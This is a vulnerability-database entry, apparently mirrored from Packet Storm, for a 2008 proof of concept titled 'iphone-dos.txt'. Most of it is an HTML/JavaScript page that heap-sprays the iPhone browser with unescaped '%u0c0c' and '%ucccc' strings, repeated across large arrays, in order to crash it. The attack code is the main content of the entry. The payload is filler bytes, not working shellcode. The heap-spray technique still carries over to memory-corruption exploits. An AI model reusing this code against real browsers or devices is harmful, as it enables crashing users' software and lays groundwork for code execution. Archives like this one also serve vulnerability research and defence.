Lucene search

K

iphone-dos.txt

๐Ÿ—“๏ธย 25 Jan 2008ย 00:00:00Reported byย c0ntexTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 16ย Views

Shellcode injection attempt using unescaped characters to attempt a crash on iPhone

Show more
Code
`<html><body><script>  
  
function Demo() {  
  
var shellcode;  
var addr;  
var fill;  
  
alert('attempting a crash!');  
shellcode = unescape('%u0c0c');  
fill = unescape('%ucccc');  
addr = 0x02020202;  
  
var b = fill;  
while (b.length <= 0x40000) b+=b;  
  
var c = new Array();  
for (var i =0; i<36; i++) {  
c[i] =   
b.substring(0, 0x100000 - shellcode.length) + shellcode +  
b.substring(0, 0x100000 - shellcode.length) + shellcode +   
b.substring(0, 0x100000 - shellcode.length) + shellcode +   
b.substring(0, 0x100000 - shellcode.length) + shellcode;  
}  
  
}  
  
</script>  
  
<input type='button' onClick='Demo()' value='Go!'>  
  
</body></html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
25 Jan 2008 00:00Current
0.2Low risk
Vulners AI Score0.2
16
.json
Report